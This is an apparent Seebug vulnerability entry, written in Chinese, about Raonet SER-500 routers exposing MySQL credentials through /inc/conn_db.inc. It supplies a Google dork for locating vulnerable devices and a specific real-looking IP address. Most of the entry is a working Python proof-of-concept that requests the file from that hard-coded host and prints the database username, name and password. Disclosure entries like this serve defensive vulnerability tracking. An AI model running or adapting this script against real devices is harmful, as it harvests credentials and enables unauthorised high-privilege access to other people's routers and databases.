Raonet Subscriber Ethernet Router MySQL 数据库账户密码泄露

2015-08-28T00:00:00
ID SSV:89255
Type seebug
Reporter ulrdflel
Modified 2015-08-28T00:00:00

Description

Raonet SER-500 路由器 MySQL 账户密码泄漏, 可远程登录, 高权限. 验证地址: http://61.77.63.86/inc/conn_db.inc Google dork: intitle:Raonet Subscriber Ethernet Router

                                        
                                            
                                                #!/usr/bin/env python
import urlparse
import re
import urllib2

def assign(service, arg):
    if service != "www":
        return
    arr = urlparse.urlparse(arg)
    return True, '%s://%s/inc/conn_db.inc' % (arr.scheme, arr.netloc)

def getMiddleStr(content, r):
    pattern = re.compile(r)
    return pattern.search(content).groups()[0]

def audit(arg):
    url = arg
    response = urllib2.urlopen(url)
    code = response.getcode()
    res = response.read()
    if code == 200:
        print 'db_id: ' + getMiddleStr(res, '\$db_id = "(\w*)"\w*')
        print 'db_name: ' + getMiddleStr(res, '\$db_name = "(\w*)"\w*')
        print 'db_pass: ' + getMiddleStr(res, '\$db_pass = "(\w*)"\w*')

if __name__ == '__main__':
    audit(assign('www', 'http://61.77.63.86/')[1])